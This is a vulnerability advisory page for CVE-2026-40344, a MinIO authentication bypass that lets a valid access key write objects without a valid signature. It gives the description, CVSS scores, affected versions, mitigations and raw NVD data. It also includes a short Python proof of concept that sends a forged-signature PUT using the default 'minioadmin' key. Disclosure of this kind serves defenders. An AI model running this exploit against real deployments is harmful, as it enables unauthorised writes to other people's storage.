CVE-2026-40344

Description

MinIO is a high-performance object storage system. Starting in RELEASE.2023-05-18T00-05-36Z and prior to RELEASE.2026-04-11T03-20-12Z, an authentication bypass vulnerability in MinIO's Snowball auto-extract handler (`PutObjectExtractHandler`) allows any user who knows a valid access key to write arbitrary objects to any bucket without knowing the secret key or providing a valid cryptographic signature. Any MinIO deployment is impacted. The attack requires only a valid access key (the well-known default `minioadmin`, or any key with WRITE permission on a bucket) and a target bucket name. When `authTypeStreamingUnsignedTrailer` support was added, the new auth type was handled in `PutObjectHandler` and `PutObjectPartHandler` but was never added to `PutObjectExtractHandler`. The snowball auto-extract handler's `switch rAuthType` block has no case for `authTypeStreamingUnsignedTrailer`, so execution falls through with zero signature verification. The `isPutActionAllowed` call before the switch extracts the access key and checks IAM permissions, but does not verify the cryptographic signature. An attacker sends a PUT request with `X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER`, `X-Amz-Meta-Snowball-Auto-Extract: true`, and an `Authorization` header containing a valid access key with a completely fabricated signature. The request is accepted and the tar payload is extracted into the bucket. Users of the open-source minio/minio project should upgrade to MinIO AIStor RELEASE.2026-04-11T03-20-12Z or later. If upgrading is not immediately possible, block unsigned-trailer requests at the load balancer. Reject any request containing X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER at the reverse proxy or WAF layer. Clients can use STREAMING-AWS4-HMAC-SHA256-PAYLOAD-TRAILER (the signed variant) instead. Alternatively, restrict WRITE permissions. Limit s3:PutObject grants to trusted principals. While this reduces the attack surface, it does not eliminate the vulnerability since any user with WRITE permission can exploit it with only their access key.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - VULNERABLE

MinIO >= RELEASE.2023-05-18T00-05-36Z

MinIO < RELEASE.2026-04-11T03-20-12Z

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-40344 PoC: MinIO Authentication Bypass
# Description: Exploits the missing signature verification for authTypeStreamingUnsignedTrailer.
# Requirements: A valid Access Key (e.g., 'minioadmin') and WRITE permission on a bucket.

target_url = "http://<target-minio-host>/<bucket-name>/test.tar"
access_key = "minioadmin"  # Replace with a valid access key

# Construct headers to bypass signature verification
headers = {
    "Authorization": f"AWS4-HMAC-SHA256 Credential={access_key}/20260422/us-east-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=fabricated_signature_12345",
    "X-Amz-Content-Sha256": "STREAMING-UNSIGNED-PAYLOAD-TRAILER",
    "X-Amz-Meta-Snowball-Auto-Extract": "true",
    "X-Amz-Date": "20260422T120000Z",
    "Content-Type": "application/x-tar"
}

# Create a simple tar payload (replace with actual malicious file)
payload = b"fake_tar_content"

try:
    response = requests.put(target_url, headers=headers, data=payload)
    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        print("[+] Exploit successful! Object uploaded without Secret Key.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40344
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40344
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40344/
[4] VulDB https://vuldb.com/cve/CVE-2026-40344
[5] https://github.com/minio/minio/commit/76913a9fd5c6e5c2dbd4e8c7faf56ed9e9e24091
[6] https://github.com/minio/minio/pull/16484
[7] https://github.com/minio/minio/security/advisories/GHSA-9c4q-hq6p-c237

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40344", "sourceIdentifier": "[email protected]", "published": "2026-04-22T01:16:05.430", "lastModified": "2026-04-27T19:28:28.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MinIO is a high-performance object storage system. Starting in RELEASE.2023-05-18T00-05-36Z and prior to RELEASE.2026-04-11T03-20-12Z, an authentication bypass vulnerability in MinIO's Snowball auto-extract handler (`PutObjectExtractHandler`) allows any user who knows a valid access key to write arbitrary objects to any bucket without knowing the secret key or providing a valid cryptographic signature. Any MinIO deployment is impacted. The attack requires only a valid access key (the well-known default `minioadmin`, or any key with WRITE permission on a bucket) and a target bucket name. When `authTypeStreamingUnsignedTrailer` support was added, the new auth type was handled in `PutObjectHandler` and `PutObjectPartHandler` but was never added to `PutObjectExtractHandler`. The snowball auto-extract handler's `switch rAuthType` block has no case for `authTypeStreamingUnsignedTrailer`, so execution falls through with zero signature verification. The `isPutActionAllowed` call before the switch extracts the access key and checks IAM permissions, but does not verify the cryptographic signature. An attacker sends a PUT request with `X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER`, `X-Amz-Meta-Snowball-Auto-Extract: true`, and an `Authorization` header containing a valid access key with a completely fabricated signature. The request is accepted and the tar payload is extracted into the bucket. Users of the open-source minio/minio project should upgrade to MinIO AIStor RELEASE.2026-04-11T03-20-12Z or later. If upgrading is not immediately possible, block unsigned-trailer requests at the load balancer. Reject any request containing X-Amz-Content-Sha256: STREAMING-UNSIGNED-PAYLOAD-TRAILER at the reverse proxy or WAF layer. Clients can use STREAMING-AWS4-HMAC-SHA256-PAYLOAD-TRAILER (the signed variant) instead. Alternatively, restrict WRITE permissions. Limit s3:PutObject grants to trusted principals. While this reduces the attack surface, it does not eliminate the vulnerability since any user with WRITE permission can exploit it with only their access key."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023-05-18t00-05-36z", "versionEndExcluding": "2026-04-11T03-20-12Z", "matchCriteriaId": "C63B131C-F150-4741-9A5B-181A55DE20B8"}]}]}], "references": [{"url": "https://github.com/minio/minio/commit/76913a9fd5c6e5c2dbd4e8c7faf56ed9e9e24091", "source": "security-adv ... (truncated)